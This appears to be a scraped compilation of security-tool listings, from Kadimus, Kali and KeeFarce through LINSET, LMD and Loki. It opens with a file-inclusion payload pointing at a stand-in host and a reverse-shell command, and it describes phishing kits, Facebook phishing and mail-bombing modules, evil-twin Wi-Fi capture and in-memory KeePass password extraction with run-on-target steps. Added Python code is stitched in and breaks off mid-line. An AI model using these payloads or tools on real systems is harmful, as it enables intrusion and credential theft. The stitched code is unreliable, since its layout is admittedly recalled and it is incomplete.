/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0


Download Kadimus

Kali Linux 1.1.0 - The Best Penetration Testing Distribution


After almost two years of public development (and another year behind the scenes), we are proud to announce our first point release of Kali Linux – version 1.1.0. This release brings with it a mix of unprecedented hardware support as well as rock solid stability. For us, this is a real milestone as this release epitomizes the benefits of our move from BackTrack to Kali Linux over two years ago. As we look at a now mature Kali, we see a versatile, flexible Linux distribution, rich with useful security and penetration testing related features, running on all sorts of weird and wonderful ARM hardware. But enough talk, here are the goods:
  • The new release runs a 3.18 kernel, patched for wireless injection attacks.
  • Our ISO build systems are now running off live-build 4.x.
  • Improved wireless driver support, due to both kernel and firmware upgrades.
  • NVIDIA Optimus hardware support.
  • A whole bunch of fixes and updates from our bug-tracker changelog.
  • And most importantly, we changed grub screens and wallpapers!

Upgrade Kali Linux 1.1.0

If you’ve already got Kali Linux installed and running, there’s no need to re-download the image as you can simply update your existing operating system using simple apt commands:
apt-get update
apt-get dist-upgrade


Kali Linux 2.0 - The Best Penetration Testing Distribution


So, what’s new in Kali 2.0? There’s a new 4.0 kernel, now based on Debian Jessie, improved hardware and wireless driver coverage, support for a variety of Desktop Environments (gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop environment and tools – and the list goes on.

Kali Linux is Now a Rolling Distribution

One of the biggest moves we’ve taken to keep Kali 2.0 up-to-date in a global, continuous manner, is transforming Kali into a rolling distribution. What this means is that we are pulling our packages continuously from Debian Testing (after making sure that all packages are installable) – essentially upgrading the Kali core system, while allowing us to take advantage of newer Debian packages as they roll out. This move is where our choice in Debian as a base system really pays off – we get to enjoy the stability of Debian, while still remaining on the cutting edge.

Continuously Updated Tools, Enhanced Workflow

Another interesting development in our infrastructure has been the integration of an upstream version checking system, which alerts us when new upstream versions of tools are released (usually via git tagging). This script runs daily on a select list of common tools and keeps us alerted if a tool requires updating. With this new system in place, core tool updates will happen more frequently. With the introduction of this new monitoring system, we will slowly start phasing out the “tool upgrades” option in our bug tracker.

New Flavours of Kali Linux 2.0

Through our Live Build process, Kali 2.0 now natively supports KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. We’ve moved on to GNOME 3 in this release, marking the end of a long abstinence period. We’ve finally embraced GNOME 3 and with a few custom changes, it’s grown to be our favourite desktop environment. We’ve added custom support for multi-level menus, true terminal transparency, as well as a handful of useful gnome shell extensions. This however has come at a price – the minimum RAM requirement for a full GNOME 3 session has increased to 768 MB. This is a non-issue on modern hardware but can be detrimental on lower-end machines. For this reason, we have also released an official, minimal Kali 2.0 ISO. This “light” flavour of Kali includes a handful of useful tools together with the lightweight Xfce desktop environment – a perfect solution for resource-constrained computers.

Kali Linux 2.0 ARM Images & NetHunter 2.0

The whole ARM image section has been updated across the board with Kali 2.0 – including Raspberry Pi, Chromebooks, Odroids… The whole lot! In the process, we’ve added some new images – such as the latest Chromebook Flip – the little beauty here on the right. Go ahead, click on the image, take a closer look. Another helpful change we’ve implemented in our ARM images is including kernel sources, for easier compilation of new drivers.
We haven’t forgotten about NetHunter, our favourite mobile penetration testing platform – which also got an update and now includes Kali 2.0. With this, we’ve released a whole barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10. The OnePlus One NetHunter image has also been updated to Kali 2.0 and now has a much awaited image for CM12 as well – check the Offensive Security NetHunter page for more information.

Updated VMware and VirtualBox Images

Offensive Security, the information security training and penetration testing company behind Kali Linux, has put up new VMware and VirtualBox Kali 2.0 images for those who want to try Kali in a virtual environment. These include 32 and 64 bit flavours of the GNOME 3 full Kali environment.
If you want to build your own virtual environment, you can consult our documentation site on how to install the various virtual guest tools for a smoother experience.

How Do I Upgrade to Kali 2.0?

Yes, you can upgrade Kali 1.x to Kali 2.0! To do this, you will need to edit your sources.list entries, and run a dist-upgrade as shown below. If you have been using incorrect or extraneous Kali repositories or otherwise manually installed or overwritten Kali packages outside of apt, your upgrade to Kali 2.0 may fail. This includes scripts like lazykali.sh, PTF, manual git clones in incorrect directories, etc. – all of these will clobber existing files on the filesystem and result in a failed upgrade. If this is the case for you, you’re better off reinstalling your OS from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot


Download Kali Linux 2.0

Kali Linux NetHunter - Android penetration testing platform


NetHunter is an Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot; however, the strength of NetHunter does not end there.

We’ve incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and we are looking forward to seeing this project and community grow.


Supported Devices
The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
  • Nexus 4 (GSM) - “mako”
  • Nexus 5 (GSM/LTE) - “hammerhead”
  • Nexus 7 [2012] (Wi-Fi) - “nakasi”
  • Nexus 7 [2012] (Mobile) - “nakasig”
  • Nexus 7 [2013] (Wi-Fi) - “razor”
  • Nexus 7 [2013] (Mobile) - “razorg”
  • Nexus 10 (Tablet) - “mantaray”
  • OnePlus One 16 GB - “bacon”
  • OnePlus One 64 GB - “bacon”

Important Concepts
  • Kali NetHunter runs within a chroot environment on the Android device so, for example, if you start an SSH server via an Android application, your SSH connection would connect to Android and not Kali Linux. This applies to all network services.
  • When configuring payloads, the IP address field is the IP address of the system where you want the shell to return to. Depending on your scenario, you may want this address to be something other than the NetHunter.
  • Due to the fact that the Android device is rooted, Kali NetHunter has access to all hardware, allowing you to connect USB devices such as wireless NICs directly to Kali using an OTG cable.

Download Kali Linux NetHunter

Katana - Framework for Hackers, Professional Security and Developers


Katana is a framework written in Python for penetration testing, based on a simple and comprehensive structure that anyone can use, modify and share. The goal is to unify tools that serve professionals during a penetration test, or simply as routine tools. The current version is neither completely stable nor complete.

The project is open to partners.

SOURCE CODE ORGANIZATION

The Katana source code is organized as follows:
-KatanaGUI/ > Source code for graphical user interface
-KatanaLAB/ > Source code for katana laboratory
-core/ > Source code core
--core/db/ > Dictionaries and tables
--core/logs/ > Registers of modules
-files/ > Files necessary for some modules
-tmp/ > Temp files
-lib/ > Libraries
-doc/ > Documentation
-scripts/ > Scripts(modules)

MAIN FILES

--core
  ¬Setting.py         --- Setting variables
  ¬design.py          --- Design template
  ¬Errors.py          --- Error Debug
  ¬ping.py            --- Functions
--scripts
  ¬__init__.py        --- Modules List


REQUIREMENTS

OS requirement: Kali Linux

INSTALLATION 

Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py

USAGE Commands

Stable ------------------------------------------------------------------
./sudo ktf.console                                   98% Built - Enabled
./sudo ktf.run -m net/arpspoof                       95% Built - Enabled
Building ----------------------------------------------------------------
ktf.lab                                              30% Built - Not yet.
ktf.linker -m web/whois -t google.com -p 80          80% Built - Not yet.

MODULES (SCRIPTS)

Code           Description                        Author       Version
web/httpbt     Brute force to http 403            Redtoor      1.0
web/formbt     Brute force to form-based          Redtoor      1.0
web/cpfinder   Admin panel finder                 Redtoor      1.0
web/joomscan   Scanner vul's cms joomla           Redtoor      1.0
web/dos        Denial of service web              Redtoor      1.0
web/whois      Who-is web                         Redtoor      1.0
net/arpspoof   ARP-Spoofing attack                Redtoor      1.0
net/arplook    ARP-Spoofing detector              cl34r        1.0
net/portscan   Port Scanner                       RedToor      1.0
set/gdreport   Getting information with web       RedToor      3.0
set/mailboom   E-mail bombing SPAM                RedToor      3.0
set/facebrok   facebook phishing platform         RedToor      1.7
fle/brutezip   Brute force to zip files           LeSZO ZerO   1.0
fle/bruterar   Brute force to rar files           LeSZO ZerO   1.0
clt/ftp        Console ftp client                 Redtoor      1.0
clt/sql        Console sql client                 Redtoor      1.0
clt/pop3       Console pop3 client                Redtoor      1.0
ser/sql        Start SQL server                   Redtoor      1.0
ser/apache     Start Apache server                Redtoor      1.0
ser/ssh        Start SSH server                   Redtoor      1.0
fbt/ftp        Brute force to ftp                 Redtoor      1.0
fbt/ssh        Brute force to ssh                 Redtoor      1.0
fbt/sql        Brute force to sql                 Redtoor      1.0
fbt/pop3       Brute force to pop3                Redtoor      1.0

LINKS

Project in SF : http://sourceforge.net/projects/katanas/files/
Documentation: https://github.com/RedToor/Katana/tree/master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/2015/07/instalacion-y-uso-katana-framework.html


Download Katana

Katoolin - Automatically install all Kali Linux tools


Automatically install all Kali linux tools

Features
  • Add Kali linux repositories
  • Remove Kali linux repositories
  • Install Kali linux tools

Requirements
  • Python 2.7
  • An operating system (tested on Ubuntu)

Installation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Video

Usage
  • Just select the number of a tool to install it
  • Press 0 to install all tools
  • back : Go back
  • gohome : Go to the main menu

Download Katoolin

KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory



KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs, is dumped into a CSV file in %AppData%.

General Design
KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the .NET runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass process's heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages
An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing
In order to execute on the target host, the following files need to be in the same folder:
  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe

Building
Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility
KeeFarce has been tested on:
  • KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (Win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment beforehand is recommended.

Acknowledgements
  • Sharp Needle by Chad Zawistowski was used for the DLL injection tech.
  • Code by Alois Kraus was used to get the pointer to object C# voodoo working.


Download KeeFarce

KeyBox - A web-based SSH console that centrally manages administrative access to systems


KeyBox is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of users' public SSH keys. Key management and administration is based on profiles assigned to defined users.

Administrators can login using two-factor authentication with FreeOTP or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web-shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.

KeyBox layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: The Security Implications of SSH. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

Prerequisites

To Run Bundled with Jetty

If you're not big on the idea of building from source...
Download keybox-jetty-vXX.XX.tar.gz
https://github.com/skavanagh/KeyBox/releases
Export environment variables
for Linux/Unix/OSX
 export JAVA_HOME=/path/to/jdk
 export PATH=$JAVA_HOME/bin:$PATH
for Windows
 set JAVA_HOME=C:\path\to\jdk
 set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
    ./startKeyBox.sh
for Windows
    startKeyBox.bat
How to Configure SSL in Jetty (it is a good idea to add or generate your own unique certificate)
http://wiki.eclipse.org/Jetty/Howto/Configure_SSL

Using KeyBox

Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme

Steps:
  1. Create systems
  2. Create profiles
  3. Assign systems to profile
  4. Assign profiles to users
  5. Users can login to create sessions on assigned systems
  6. Start a composite SSH session or create and execute a script across multiple sessions
  7. Add additional public keys to systems
  8. Disable any administrative public key, forcing key rotation.
  9. Audit session history

Download KeyBox

King Phisher - Phishing Campaign Toolkit


King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. It features an easy to use, yet very flexible architecture allowing full control over both emails and server content. King Phisher can be used to run campaigns ranging from simple awareness training to more complicated scenarios in which user aware content is served for harvesting credentials.

King Phisher is only to be used for legal applications when the explicit permission of the targeted organization has been obtained.


Why Use King Phisher

Fully Featured And Flexible

King Phisher was created out of a need for an application that would facilitate running multiple separate campaigns with different goals ranging from education, credential harvesting and so called "Drive By" attacks. King Phisher has been used to run campaigns ranging from hundreds of targets to tens of thousands of targets with ease. It also supports sending messages with embedded images and determining when emails are opened with a tracking image.

Integrated Web Server

King Phisher uses the packaged web server that comes standard with Python making configuring a separate instance unnecessary.

Open Source

The Python programming language makes it possible to modify the King Phisher source code to suit the specific needs of the user. Alternatively, end users not interested in modifying the source code are welcome to open an issue and request a feature. Users are able to run campaigns as large as they like, as often as they like.

No Web Interface

No web interface makes it more difficult for prying eyes to identify that the King Phisher server is being used for social engineering. Additionally the lack of a web interface reduces the exposure of the King Phisher operator to web related vulnerabilities such as XSS.


Download King Phisher

Kunai - Pwning & Info Gathering via User Browser



Sometimes there is a need to obtain the IP address of a specific person or to perform client-side attacks via the user's browser. This is what you need in such situations.

Kunai is a simple script which collects a lot of information about a visitor and saves the output to a file; furthermore, you may try to perform attacks on the user's browser using BeEF or Metasploit.

In order to grab as much information as possible, the script detects whether JavaScript is enabled so it can obtain more details about a visitor. For example, you can include this script in an iframe, or perform redirects, to avoid detection of suspicious activity. The script can notify you via email about users that visit it. Whenever someone visits your hook (kunai), the output file is updated.

Functions
  • Stores information about users in elegant output
  • Website spoofing
  • Redirects
  • BeEF & Metasploit compatibility
  • Email notification
  • Different reaction for browsers with JavaScript disabled
  • One file composition

Example configs
  • Website spoofing (more stable & better for autopwn & beef):
  • Redirect (better for quick ip catching):
goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
  • Cross Site Scripting (inclusion)

LiME - Linux Memory Extractor


A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android. This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Features
  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint

Usage
Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.
LiME utilizes the insmod command to load the module, passing required arguments for its execution.
insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples
In this example we use adb to load LiME and then start it with acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Now on the host machine, we can establish the connection and acquire memory using netcat
$ nc localhost 4444 > ram.lime
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"
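To make the three output formats above concrete, here is an added example (not part of LiME or its documentation) that parses a format=lime capture and rebuilds the equivalent format=padded image. The header layout it assumes (uint32 magic 0x4C694D45, uint32 version 1, uint64 inclusive start and end addresses, 8 reserved bytes, 32 bytes in total, native byte order) is taken from LiME's lime.h as recalled, not from this page, so check it against the source before relying on it; the two-range capture it reads is constructed inside the code.

```python
import struct
from typing import List, Tuple

# Header layout assumed here from LiME's lime.h (it is not spelled out on this
# page): uint32 magic, uint32 version, uint64 start, uint64 end, 8 reserved bytes,
# written in the target's native byte order (little-endian on x86/ARM).
LIME_MAGIC = 0x4C694D45              # reads as "EMiL" in a little-endian hex dump
LIME_VERSION = 1
HEADER = struct.Struct("<IIQQ8s")    # 32 bytes

Range = Tuple[int, int, bytes]       # (start, end, data); end is inclusive


def parse_lime(capture: bytes) -> List[Range]:
    """Walk a format=lime capture and return one (start, end, data) per range.
    Any inconsistency is raised rather than skipped: a forensic image that does
    not parse cleanly should be flagged, not silently repaired."""
    ranges: List[Range] = []
    off = 0
    while off < len(capture):
        if len(capture) - off < HEADER.size:
            raise ValueError(f"truncated header at offset {off}")
        magic, version, start, end, _reserved = HEADER.unpack_from(capture, off)
        if magic != LIME_MAGIC:
            raise ValueError(f"bad magic 0x{magic:08x} at offset {off}")
        if version != LIME_VERSION:
            raise ValueError(f"unsupported header version {version}")
        if end < start:
            raise ValueError(f"range end 0x{end:x} precedes start 0x{start:x}")
        length = end - start + 1
        off += HEADER.size
        data = capture[off:off + length]
        if len(data) != length:
            raise ValueError(f"range 0x{start:x}-0x{end:x} truncated at offset {off}")
        ranges.append((start, end, data))
        off += length
    return ranges


def build_lime(ranges: List[Range]) -> bytes:
    """Inverse of parse_lime; used here only to construct the sample capture."""
    out = bytearray()
    for start, end, data in ranges:
        out += HEADER.pack(LIME_MAGIC, LIME_VERSION, start, end, b"\0" * 8)
        out += data
    return bytes(out)


def to_padded(ranges: List[Range]) -> bytes:
    """Rebuild the layout that format=padded would have produced: every byte
    from 0 to the highest range end, with the non-System-RAM gaps zero-filled."""
    if not ranges:
        return b""
    image = bytearray(max(end for _, end, _ in ranges) + 1)
    for start, end, data in ranges:
        image[start:end + 1] = data
    return bytes(image)


# Constructed two-range capture: RAM at 0x1000-0x1fff and 0x3000-0x30ff with a
# 4 KiB hole between them, as a device with reserved regions would report.
SAMPLE_RANGES: List[Range] = [
    (0x1000, 0x1FFF, b"A" * 0x1000),
    (0x3000, 0x30FF, b"B" * 0x100),
]
SAMPLE_CAPTURE = build_lime(SAMPLE_RANGES)

if __name__ == "__main__":
    for start, end, data in parse_lime(SAMPLE_CAPTURE):
        print(f"range 0x{start:x}-0x{end:x}: {len(data)} bytes")
    print(f"padded image: {len(to_padded(SAMPLE_RANGES))} bytes")
```

The parser refuses rather than guesses on a bad magic, a version it does not know, a reversed range or a short final range, which is the behaviour you want when deciding whether a capture taken over netcat is complete before analysing it.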


Download LiME

LINSET - WPA/WPA2 Hack Without Brute Force


How it works
  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
  • Mounts one FakeAP imitating the original
  • A DHCP server is created on FakeAP
  • It creates a DNS server to redirect all requests to the Host
  • The web server with the selected interface is launched
  • The mechanism is launched to check the validity of the passwords that will be introduced
  • It deauthenticates all users of the network, hoping they will connect to the FakeAP and enter the password.
  • The attack will stop after the correct password checking
The dependencies must be installed; Linset checks for them and reports whether each one is installed or not.

It is also preferable to keep the negative-channel patch applied; otherwise you will have trouble carrying out the attack correctly.

How to use
$ chmod +x linset
$ ./linset


Download LINSET

LMD - Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches; they are also easily exported to any number of detection tools such as ClamAV.

The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remain abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931
Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there were 6,931 or 78% of threats that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58% with a low and high detection rate of 10% and 100% respectively. There could not be a clearer statement of the need for an open and community driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:
  • MD5 file hash detection for quick threat identification
  • HEX based pattern matching for identifying threat variants
  • statistical analysis component for detection of obfuscated threats (e.g: base64)
  • integrated detection of ClamAV to use as scanner engine for improved performance
  • integrated signature update feature with -u|--update
  • integrated version update feature with -d|--update-ver
  • scan-recent option to scan only files that have been added/changed in X days
  • scan-all option for full path based scanning
  • checkout option to upload suspected malware to rfxn.com for review / hashing
  • full reporting system to view current and previous scan results
  • quarantine queue that stores threats in a safe fashion with no permissions
  • quarantine batching option to quarantine the results of a current or past scans
  • quarantine restore option to restore files to original path, owner and perms
  • quarantine suspend account option to Cpanel suspend or shell revoke users
  • cleaner rules to attempt removal of malware injected strings
  • cleaner batching option to attempt cleaning of previous scan reports
  • cleaner rules to remove base64 and gzinflate(base64(...)) injected malware
  • daily cron based scanning of all changes in last 24h in user homedirs
  • daily cron script compatible with stock RH style systems, Cpanel & Ensim
  • kernel based inotify real time file scanning of created/modified/moved files
  • kernel inotify monitor that can take path data from STDIN or FILE
  • kernel inotify monitor convenience feature to monitor system users
  • kernel inotify monitor can be restricted to a configurable user html root
  • kernel inotify monitor with dynamic sysctl limits for optimal performance
  • kernel inotify alerting through daily and/or optional weekly reports
  • e-mail alert reporting after every scan execution (manual & daily)
  • path, extension and signature based ignore options
  • background scanner option for unattended scan operations
  • verbose logging & output of all actions


Source Data:
The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:
Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which is logged by our network edge IPS. The IPS events are processed to extract malware URLs, decode POST payloads and base64/gzip encoded abuse data, and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:
The LMD signatures are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the --update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914 HEX) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:
base64.inject.unclassed     perl.ircbot.xscan
bin.dccserv.irsexxy         perl.mailer.yellsoft
bin.fakeproc.Xnuxer         perl.shell.cbLorD
bin.ircbot.nbot             perl.shell.cgitelnet
bin.ircbot.php3             php.cmdshell.c100
bin.ircbot.unclassed        php.cmdshell.c99
bin.pktflood.ABC123         php.cmdshell.cih
bin.pktflood.osf            php.cmdshell.egyspider
bin.trojan.linuxsmalli      php.cmdshell.fx29
c.ircbot.tsunami            php.cmdshell.ItsmYarD
exp.linux.rstb              php.cmdshell.Ketemu
exp.linux.unclassed         php.cmdshell.N3tshell
exp.setuid0.unclassed       php.cmdshell.r57
gzbase64.inject             php.cmdshell.unclassed
html.phishing.auc61         php.defash.buno
html.phishing.hsbc          php.exe.globals
perl.connback.DataCha0s     php.include.remote
perl.connback.N2            php.ircbot.InsideTeam
perl.cpanel.cpwrap          php.ircbot.lolwut
perl.ircbot.atrixteam       php.ircbot.sniper
perl.ircbot.bRuNo           php.ircbot.vj_denie
perl.ircbot.Clx             php.mailer.10hack
perl.ircbot.devil           php.mailer.bombam
perl.ircbot.fx29            php.mailer.PostMan
perl.ircbot.magnum          php.phishing.AliKay
perl.ircbot.oldwolf         php.phishing.mrbrain
perl.ircbot.putr4XtReme     php.phishing.ReZulT
perl.ircbot.rafflesia       php.pktflood.oey
perl.ircbot.UberCracker     php.shell.rc99
perl.ircbot.xdh             php.shell.shellcomm


Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with:
http://www.rfxn.com/upgrade-centos-4-8-to-5-3/

There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES.
       e.g: maldet --monitor users
       e.g: maldet --monitor /root/monitor_paths
       e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then only the user's webdir, if it exists, will be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.


Download LMD

Loki - Scanner for Simple Indicators of Compromise


Simple IOC Scanner

Detection is based on four detection methods:
1. File Name IOC
   Regex match on full file path/name

2. Yara Rule Check
   Yara signature match on file data and process memory

3. Hash check
   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
The Windows binary is compiled with PyInstaller 2.1 and should run as x86 application on both x86 and x64 based systems.
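The detection methods listed above for LOKI (file name regex, hash check) and the signature types LMD describes earlier on this page (MD5 file hashes, HEX pattern matches, statistical analysis of base64 blobs) can be combined into one small scanner that makes the differences between the methods visible. The following is an added example, not code from either project: the signature names, hex patterns, filename regexes and sample files are all constructed for the illustration, and the GREEN/YELLOW/RED mapping is an assumed simplification of LOKI's result lines.

```python
import base64
import hashlib
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str]   # (detection method, signature name)

# --- Constructed signature set -------------------------------------------
# Names mimic the family.type.variant style used by LMD; none of these are
# real LMD or LOKI signatures.

# Filename IOCs: regexes applied to the full path (LOKI's first method).
FILENAME_IOCS: List[Tuple[str, str]] = [
    (r"(?i)/(c99|r57)\.php$", "php.cmdshell.generic-name"),
    (r"(?i)\.(jpg|png|gif)\.php$", "php.doubleext.upload"),
]

# HEX pattern signatures, stored the way LMD stores them (hex of the raw bytes)
# and matched anywhere in the file content.
HEX_SIGNATURES: Dict[str, bytes] = {
    "php.cmdshell.eval-post": bytes.fromhex("3c3f70687020406576616c28245f504f53545b"),  # <?php @eval($_POST[
    "php.include.remote": bytes.fromhex("696e636c756465282768747470"),                  # include('http
}

# Hash IOCs: a constructed "known bad" file stands in for a hash feed entry.
_KNOWN_BAD = b"#!/usr/bin/perl\n# constructed sample standing in for a known IRC bot\n"
HASH_IOCS: Dict[str, str] = {
    hashlib.md5(_KNOWN_BAD).hexdigest(): "perl.ircbot.constructed",
    hashlib.sha256(_KNOWN_BAD).hexdigest(): "perl.ircbot.constructed",
}

# Statistical heuristic for obfuscated payloads: a long uninterrupted run of
# base64 alphabet characters (the idea behind LMD's statistical component).
_BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{120,}={0,2}")


def scan_file(path: str, data: bytes) -> List[Finding]:
    """Apply all four methods to one file; an empty list means clean."""
    findings: List[Finding] = []
    for pattern, name in FILENAME_IOCS:
        if re.search(pattern, path):
            findings.append(("filename", name))
    for algo in ("md5", "sha1", "sha256"):
        digest = hashlib.new(algo, data).hexdigest()
        if digest in HASH_IOCS:
            findings.append(("hash:" + algo, HASH_IOCS[digest]))
    for name, needle in HEX_SIGNATURES.items():
        if needle in data:
            findings.append(("hex", name))
    if _BASE64_RUN.search(data):
        findings.append(("statistical", "base64.blob.heuristic"))
    return findings


def severity(findings: List[Finding]) -> str:
    """LOKI-style result line: RED for hash or hex hits, YELLOW for weaker
    indicators (file name, statistics), GREEN when nothing matched."""
    methods = {method.split(":")[0] for method, _ in findings}
    if methods & {"hash", "hex"}:
        return "RED"
    if methods:
        return "YELLOW"
    return "GREEN"


def scan_tree(files: Dict[str, bytes]) -> Dict[str, List[Finding]]:
    """Scan an in-memory tree {path: content}; on a real system the dict would
    be replaced by walking a directory and reading each file."""
    return {path: scan_file(path, data) for path, data in files.items()}


# Constructed sample tree: one clean page, a web shell under an upload dir, a
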